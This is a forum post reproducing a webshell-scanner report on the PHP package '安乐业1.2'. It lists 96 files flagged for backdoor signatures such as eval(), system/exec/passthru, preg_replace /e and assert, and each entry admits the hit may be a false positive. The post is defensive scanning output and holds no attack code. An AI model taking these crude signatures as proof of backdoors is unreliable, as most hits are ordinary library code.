源码论坛,商业源码下载,尽在锦尚中国商业源码论坛

标题: 安乐业检测报告 [打印本页]

作者: 滨少    时间: 2010-3-22 12:15
标题: 安乐业检测报告
检测报告

检测时间:2010-3-22 12:07:23开始,2010-3-22 12:07:53结束!
检测结果:一共检查文件夹460个,文件4,424个,符合扫描条件(php)文件1,381个。本次扫描共发现严重可疑文件夹0个,可疑文件96个,其中严重可疑文件0个(严重可疑点合计0处)!

文件路径 特征码 描述 创建/修改时间
E:\Download\安乐业1.2\fangke\admin\borough\updateCheck.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:41
2010-3-16 4:13:30
E:\Download\安乐业1.2\fangke\bbs\image.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:42
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\memcp.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:46
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\notice.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:46
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\pm.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:47
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\stats.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:47
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\task.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:47
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\viewthread.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:49
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\addons.inc.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:41
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\admingroups.inc.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:41
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\attach.inc.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:41
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\checktools.inc.php 包含危险函数preg_replace+/e preg_replace+/e可以执行任意PHP代码,可能是程序漏洞或者恶意后门程序。 2010-3-22 12:05:41
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\creditwizard.inc.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:41
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\db.inc.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:41
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\db.inc.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:41
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\forums.inc.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:41
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\forums.inc.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:41
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\global.func.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:41
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\jswizard.inc.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:42
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\jswizard.inc.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:42
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\medals.inc.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:42
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\members.inc.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:42
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\members.inc.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:42
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\misc.inc.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:42
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\moderate.inc.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:42
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\plugins.inc.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:42
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\plugins.inc.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:42
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\project.inc.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:42
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\prune.inc.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:42
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\recyclebin.inc.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:42
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\search.inc.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:42
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\settings.inc.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:42
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\smilies.inc.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:42
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\styles.inc.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:42
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\styles.inc.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:42
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\threads.inc.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:42
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\usergroups.inc.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:42
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\admin\zip.func.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:42
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\archiver\index.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:42
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\forumdata\cache\cache_usergroups.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:42
2010-3-18 11:11:30
E:\Download\安乐业1.2\fangke\bbs\forumdata\cache\cache_viewthread.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:42
2010-3-18 11:11:30
E:\Download\安乐业1.2\fangke\bbs\forumdata\cache\usergroup_1.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:42
2010-3-18 11:11:30
E:\Download\安乐业1.2\fangke\bbs\forumdata\cache\usergroup_2.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:42
2010-3-18 11:11:30
E:\Download\安乐业1.2\fangke\bbs\forumdata\cache\usergroup_3.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:42
2010-3-18 11:11:30
E:\Download\安乐业1.2\fangke\bbs\forumdata\cache\usergroup_4.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:42
2010-3-18 11:11:30
E:\Download\安乐业1.2\fangke\bbs\forumdata\cache\usergroup_5.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:42
2010-3-18 11:11:30
E:\Download\安乐业1.2\fangke\bbs\forumdata\cache\usergroup_6.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:42
2010-3-18 11:11:30
E:\Download\安乐业1.2\fangke\bbs\forumdata\cache\usergroup_7.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:42
2010-3-18 11:11:30
E:\Download\安乐业1.2\fangke\bbs\forumdata\cache\usergroup_8.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:42
2010-3-18 11:11:30
E:\Download\安乐业1.2\fangke\bbs\include\cache.func.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:45
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\include\cache.func.php 包含危险函数preg_replace+/e preg_replace+/e可以执行任意PHP代码,可能是程序漏洞或者恶意后门程序。 2010-3-22 12:05:45
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\include\cache.func.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:45
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\include\discuzcode.func.php 包含危险函数preg_replace+/e preg_replace+/e可以执行任意PHP代码,可能是程序漏洞或者恶意后门程序。 2010-3-22 12:05:45
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\include\editpost.inc.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:45
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\include\global.func.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:45
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\include\global.func.php 包含危险函数preg_replace+/e preg_replace+/e可以执行任意PHP代码,可能是程序漏洞或者恶意后门程序。 2010-3-22 12:05:45
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\include\image.class.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:45
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\include\misc.func.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:45
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\include\newreply.inc.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:45
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\include\post.func.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:45
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\include\request.func.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:45
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\include\sendmail.inc.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:45
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\include\template.func.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:45
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\include\template.func.php 包含危险函数preg_replace+/e preg_replace+/e可以执行任意PHP代码,可能是程序漏洞或者恶意后门程序。 2010-3-22 12:05:45
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\manyou\api\class\MyBase.php 包含危险函数assert、call_user_func、call_user_func_array、create_function assert、call_user_func、call_user_func_array、create_function等函数可以执行任意PHP代码,有可能是程序漏洞或者后门程序,由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:45
2010-1-6 21:47:42
E:\Download\安乐业1.2\fangke\bbs\modcp\forums.inc.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:46
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\modcp\members.inc.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:46
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\plugins\dps_postawards\postawards.inc.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:46
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\templates\default\admincp.lang.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:47
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\uc_client\client.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:48
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\uc_client\client.php 包含危险函数assert、call_user_func、call_user_func_array、create_function assert、call_user_func、call_user_func_array、create_function等函数可以执行任意PHP代码,有可能是程序漏洞或者后门程序,由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:48
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\uc_client\model\base.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:48
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\bbs\wap\include\global.func.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:49
2010-1-6 21:36:40
E:\Download\安乐业1.2\fangke\common\apps\insert.ads.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:49
2010-3-17 18:59:50
E:\Download\安乐业1.2\fangke\common\lib\classes\json.class.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:50
2010-3-16 4:18:30
E:\Download\安乐业1.2\fangke\common\lib\classes\SendMail.class.php 包含危险函数preg_replace+/e preg_replace+/e可以执行任意PHP代码,可能是程序漏洞或者恶意后门程序。 2010-3-22 12:05:50
2010-3-16 4:18:30
E:\Download\安乐业1.2\fangke\common\lib\classes\SendMail.class.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:50
2010-3-16 4:18:30
E:\Download\安乐业1.2\fangke\common\lib\classes\Services_JSON.class.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:50
2010-3-16 4:18:30
E:\Download\安乐业1.2\fangke\common\lib\classes\Util.inc.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:50
2010-3-16 4:18:30
E:\Download\安乐业1.2\fangke\common\lib\FCKeditor\editor\dialog\fck_spellerpages\spellerpages\server-scripts\spellchecker.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:51
2010-3-16 4:18:30
E:\Download\安乐业1.2\fangke\common\lib\phpExcel\PHPExcel\Calculation.php 包含危险函数assert、call_user_func、call_user_func_array、create_function assert、call_user_func、call_user_func_array、create_function等函数可以执行任意PHP代码,有可能是程序漏洞或者后门程序,由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:56
2010-3-16 4:18:46
E:\Download\安乐业1.2\fangke\common\lib\phpExcel\PHPExcel\Calculation\Functions.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:56
2010-3-16 4:18:46
E:\Download\安乐业1.2\fangke\common\lib\phpExcel\PHPExcel\Shared\XMLWriter.php 包含危险函数assert、call_user_func、call_user_func_array、create_function assert、call_user_func、call_user_func_array、create_function等函数可以执行任意PHP代码,有可能是程序漏洞或者后门程序,由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:57
2010-3-16 4:18:48
E:\Download\安乐业1.2\fangke\common\lib\phpExcel\PHPExcel\Writer\Excel5\Workbook.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:57
2010-3-16 4:18:50
E:\Download\安乐业1.2\fangke\common\lib\smarty\libs\Smarty.class.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:57
2010-3-16 4:18:52
E:\Download\安乐业1.2\fangke\common\lib\smarty\libs\Smarty.class.php 包含危险函数assert、call_user_func、call_user_func_array、create_function assert、call_user_func、call_user_func_array、create_function等函数可以执行任意PHP代码,有可能是程序漏洞或者后门程序,由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:57
2010-3-16 4:18:52
E:\Download\安乐业1.2\fangke\common\lib\smarty\libs\Smarty_Compiler.class.php 包含危险函数assert、call_user_func、call_user_func_array、create_function assert、call_user_func、call_user_func_array、create_function等函数可以执行任意PHP代码,有可能是程序漏洞或者后门程序,由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:57
2010-3-16 4:18:52
E:\Download\安乐业1.2\fangke\common\lib\smarty\libs\internals\core.get_php_resource.php 包含危险函数assert、call_user_func、call_user_func_array、create_function assert、call_user_func、call_user_func_array、create_function等函数可以执行任意PHP代码,有可能是程序漏洞或者后门程序,由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:57
2010-3-16 4:18:50
E:\Download\安乐业1.2\fangke\common\lib\smarty\libs\internals\core.is_secure.php 包含危险函数assert、call_user_func、call_user_func_array、create_function assert、call_user_func、call_user_func_array、create_function等函数可以执行任意PHP代码,有可能是程序漏洞或者后门程序,由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:57
2010-3-16 4:18:50
E:\Download\安乐业1.2\fangke\common\lib\smarty\libs\internals\core.is_secure.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:57
2010-3-16 4:18:50
E:\Download\安乐业1.2\fangke\common\lib\smarty\libs\internals\core.is_trusted.php 包含危险函数assert、call_user_func、call_user_func_array、create_function assert、call_user_func、call_user_func_array、create_function等函数可以执行任意PHP代码,有可能是程序漏洞或者后门程序,由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:57
2010-3-16 4:18:50
E:\Download\安乐业1.2\fangke\common\lib\smarty\libs\internals\core.is_trusted.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:57
2010-3-16 4:18:50
E:\Download\安乐业1.2\fangke\common\lib\smarty\libs\internals\core.read_cache_file.php 包含危险函数assert、call_user_func、call_user_func_array、create_function assert、call_user_func、call_user_func_array、create_function等函数可以执行任意PHP代码,有可能是程序漏洞或者后门程序,由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:57
2010-3-16 4:18:50
E:\Download\安乐业1.2\fangke\common\lib\smarty\libs\internals\core.write_cache_file.php 包含危险函数assert、call_user_func、call_user_func_array、create_function assert、call_user_func、call_user_func_array、create_function等函数可以执行任意PHP代码,有可能是程序漏洞或者后门程序,由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:57
2010-3-16 4:18:50
E:\Download\安乐业1.2\fangke\common\lib\smarty\libs\plugins\function.eval.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:57
2010-3-16 4:18:50
E:\Download\安乐业1.2\fangke\common\lib\smarty\libs\plugins\function.mailto.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:57
2010-3-16 4:18:52
E:\Download\安乐业1.2\fangke\common\lib\smarty\libs\plugins\function.math.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:57
2010-3-16 4:18:52
E:\Download\安乐业1.2\fangke\common\lib\smarty\libs\plugins\modifier.regex_replace.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:05:57
2010-3-16 4:18:52
E:\Download\安乐业1.2\fangke\conf\adminMenu.cfg.php 包含危险函数system、exec、shell_exec、popen、proc_open、passthru、pcntl_exec system、exec、shell_exec、popen、proc_open、passthru等函数可以执行任意系统命令,被一些后门利用。由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:05:57
2010-3-16 4:22:12
E:\Download\安乐业1.2\fangke\uc\lib\template.class.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:06:06
2010-3-16 4:30:26
E:\Download\安乐业1.2\fangke\uc\model\base.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:06:06
2010-3-16 4:30:26
E:\Download\安乐业1.2\fangke\uc_client\client.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:06:07
2010-3-16 4:30:26
E:\Download\安乐业1.2\fangke\uc_client\client.php 包含危险函数assert、call_user_func、call_user_func_array、create_function assert、call_user_func、call_user_func_array、create_function等函数可以执行任意PHP代码,有可能是程序漏洞或者后门程序,由于程序中可能会遇到,所以有可能是误报。 2010-3-22 12:06:07
2010-3-16 4:30:26
E:\Download\安乐业1.2\fangke\uc_client\model\base.php Eval eval()函数可以执行任意PHP代码,被一些后门利用。其形式一般是:eval(X)
但是javascript代码中也可以使用,有可能是误报。 2010-3-22 12:06:07
2010-3-16 4:30:26
